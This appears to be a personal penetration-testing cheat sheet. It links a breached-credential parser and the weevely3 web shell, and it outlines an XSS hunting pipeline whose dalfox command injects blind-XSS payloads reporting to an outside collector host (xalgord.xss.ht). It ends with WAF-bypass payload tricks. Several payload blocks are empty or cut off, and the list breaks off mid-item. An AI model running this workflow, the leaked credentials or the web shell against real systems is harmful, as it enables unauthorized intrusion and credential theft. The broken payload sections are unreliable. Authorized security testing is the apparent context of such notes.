---
description: 'description: For Personal Reference'
---
# 🧑🏫 My Methodologies
#### Gathering Breached Credentials
* [https://github.com/hmaverickadams/breach-parse](https://github.com/hmaverickadams/breach-parse)
#### file upload vulnerability test
* [https://github.com/epinna/weevely3](https://github.com/epinna/weevely3)
**Set domain scope (burpsuite)**
```
.*\.target\.com$
```
#### XSS recon methodology
▶ cat domains.txt | waybackurls > urls
```
cat urls.txt --> read the file
| kxss --> filter special characters
| sed 's/=.*/=/' --> remove everything after = ,add =
| sed 's/URL: //' --> remove URL: and white space
| dalfox pipe --> dalfox tool for xss payload
-b xalgord.xss.ht --> BXSS payload adder.
```
#### KXSS
The vulnerable parameter for XSS should have Unfiltered : **\[“ ‘ < > $ | ( ) \` : ; { } ]**
**Payload:**
```
">
```
2. Try to break firewall regex with new line (\r\n), aka. CRLF injection:
```
```
3. Try double encoding:
```
%2522
```
4. Testing for recursive filters, if firewall removes the text in bold, we will have clear payload:
```
ipt>alert(1);ipt>
```
5. Injecting anchor tag without whitespaces:
```
```
6. Try to bypass whitespaces using a bullet:
```